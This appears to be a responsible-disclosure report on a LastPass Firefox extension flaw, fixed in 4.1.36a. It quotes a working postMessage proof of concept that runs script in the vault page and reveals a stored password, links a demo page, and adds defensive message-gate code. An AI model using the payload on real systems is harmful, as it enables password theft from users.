
Issue 1217

Starred by 5 users

Issue metadata

Status: Fixed
Closed: May 2017

LastPass: Firefox error pages still load Content Scripts, allowing access to ExtensionProxyService

Project Member Reported by taviso@google.com, Mar 21 2017

Issue description

The fix for issue 1209 was to prevent loading the special domain `1min-ui-prod.service.lastpass.com`. This works in Chrome, but Firefox loads content scripts into error pages, allowing a similar vulnerability to be exploited.

The list of procedure calls available is completely different, but I noticed that the procedure `ResetScript` will load an arbitrary URL, and then run arbitrary script in it.

This is effectively a UXSS, allowing anyone to compromise any website. But...because the URL being opened is from an extension, it can open non-websafe URLs, e.g. resource://support-at-lastpass-dot-com/data/vault.html. This allows a simple demo where your password can be read back from the vault, e.g.:

        w.postMessage({
            type: "ResetScript",
            data: [
                {
                    appId: 1,
                    url: "resource://support-at-lastpass-dot-com/data/vault.html",
                    appName: "exploit",
                    username: "root",
                    script: 'javascript:setTimeout(\'document.getElementsByClassName("itemButton edit")[1].click()\', 1000);' 
                        +   'setTimeout(\'alert(document.getElementById("siteDialogPassword").value)\',2000);'
                        +   'throw 1;'
                }
            ]
        }, "*")

I uploaded a demo version here (this URL is secret):

https://lock.cmpxchg8b.com/fie5uGae/lastpass.html

It reliably alert()s the password for a random site in my vault.

This bug is subject to a 90 day disclosure deadline. After 90 days elapse or a patch has been made broadly available, the bug report will become visible to the public.

Attachment: Windows 7-2017-03-21-15-28-52.png (128 KB)
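Added illustration, not LastPass's code and not the fix shipped in 4.1.36a (the report does not describe what that fix changed): a content-script message gate for page-to-extension requests of the shape quoted above. The vulnerable pattern is a listener that acts on any postMessage regardless of `event.origin` and passes `url` and `script` through to the extension unchecked. The gate below requires a trusted sender origin, accepts only http(s) targets (so resource:, moz-extension: and javascript: URLs are refused) and has no inline `script` field at all. The origin allowlist, the message-type list and the `validateMessage`/`installMessageGate` names are assumptions for the example; it runs stand-alone in Node against a constructed fake window.

```javascript
// Added example (not LastPass code): gate page -> content-script messages
// before anything is forwarded to the extension background.
// Allowlists below are constructed for the example, not LastPass's values.

const TRUSTED_ORIGINS = new Set(["https://lastpass.com", "https://www.lastpass.com"]);
const ALLOWED_TYPES = new Set(["ResetScript"]);
const ALLOWED_URL_PROTOCOLS = new Set(["http:", "https:"]);
const MAX_ENTRIES = 16;

// Only ordinary web schemes may be opened on behalf of a page. Privileged
// schemes (resource:, moz-extension:, chrome:, about:, file:) and
// javascript: are rejected by the allowlist rather than by a denylist.
function isAllowedUrl(value) {
  if (typeof value !== "string") return false;
  let url;
  try {
    url = new URL(value);
  } catch (e) {
    return false; // unparsable: treat as unsafe
  }
  return ALLOWED_URL_PROTOCOLS.has(url.protocol);
}

// Returns null when the entry is acceptable, otherwise a reason string.
function validateEntry(entry, index) {
  if (entry === null || typeof entry !== "object") return `entry ${index}: not an object`;
  if (!Number.isInteger(entry.appId) || entry.appId < 0) return `entry ${index}: bad appId`;
  if (!isAllowedUrl(entry.url)) return `entry ${index}: url scheme not allowed`;
  // Script to run in the opened page is never accepted from a web page.
  if ("script" in entry) return `entry ${index}: inline script field is not accepted`;
  return null;
}

// event has the shape of a MessageEvent: { origin, data }.
function validateMessage(event) {
  if (!TRUSTED_ORIGINS.has(event.origin)) {
    return { ok: false, reason: `untrusted origin ${event.origin}` };
  }
  const msg = event.data;
  if (msg === null || typeof msg !== "object") return { ok: false, reason: "data is not an object" };
  if (!ALLOWED_TYPES.has(msg.type)) return { ok: false, reason: `unknown type ${String(msg.type)}` };
  if (!Array.isArray(msg.data) || msg.data.length === 0 || msg.data.length > MAX_ENTRIES) {
    return { ok: false, reason: "data must be a non-empty array" };
  }
  for (let i = 0; i < msg.data.length; i++) {
    const problem = validateEntry(msg.data[i], i);
    if (problem !== null) return { ok: false, reason: problem };
  }
  return { ok: true, reason: "" };
}

// Register the gate on a window; `forward` receives only validated messages,
// `log` (optional) receives one line per dropped message for telemetry.
function installMessageGate(win, forward, log) {
  win.addEventListener("message", (event) => {
    const verdict = validateMessage(event);
    if (!verdict.ok) {
      if (log) log(`dropped message from ${event.origin}: ${verdict.reason}`);
      return;
    }
    forward(event.data);
  });
}

// Stand-alone demo against a constructed fake window (no browser needed).
function demo() {
  const listeners = [];
  const fakeWindow = {
    addEventListener: (type, fn) => { if (type === "message") listeners.push(fn); },
  };
  const forwarded = [];
  const dropped = [];
  installMessageGate(fakeWindow, (m) => forwarded.push(m), (line) => dropped.push(line));
  const dispatch = (origin, data) => listeners.forEach((fn) => fn({ origin, data }));

  // Request shape quoted in the report, sent from an untrusted page.
  const hostile = {
    type: "ResetScript",
    data: [{ appId: 1, url: "resource://support-at-lastpass-dot-com/data/vault.html",
             appName: "exploit", username: "root", script: "javascript:void 0" }],
  };
  dispatch("https://attacker.example", hostile);   // dropped: origin
  dispatch("https://lastpass.com", hostile);       // dropped: resource: url
  dispatch("https://lastpass.com", {               // forwarded
    type: "ResetScript",
    data: [{ appId: 1, url: "https://example.com/login", appName: "demo", username: "user" }],
  });
  return { forwarded: forwarded.length, dropped: dropped.length, log: dropped };
}

console.log(JSON.stringify(demo(), null, 2));
```

Two points about the design: the `"*"` target origin in the quoted payload is the sender's choice and proves nothing, so the receiver has to check `event.origin` itself; and even with this gate in place the content script is still running in a page the extension never meant to run on, so the error-page behaviour noted in comment 1 still needs to be addressed on its own.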
Comment 1 by taviso@google.com (Project Member), Mar 22 2017

Labels: -Restrict-View-Commit
It looks like LastPass have released 4.1.36a which fixes this issue.

Firefox users should be automatically updated.

Thanks to LastPass for another super quick response.

Sidenote: I think it might be a Mozilla bug that neterror pages load content scripts, it feels unintentional. I'll file a low-priority bugzilla bug later today.
Comment 2 by taviso@google.com (Project Member), May 4 2017

Status: Fixed (was: New)

Comment 3 Deleted
